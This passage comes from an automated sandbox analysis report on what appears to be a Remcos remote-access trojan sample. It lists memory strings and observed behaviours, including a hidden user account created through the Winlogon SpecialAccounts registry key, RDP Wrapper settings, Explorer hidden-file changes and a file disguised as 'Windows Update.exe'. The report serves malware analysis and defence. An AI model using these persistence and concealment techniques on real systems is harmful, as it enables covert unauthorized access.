VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Hides user accountsShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList KFypzIkJump to behavior
                    Changes the view of files in windows explorer (hidden files and folders)Show sources
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040CD53 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0040CD53
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess information set: NOOPENFILEERRORBOX
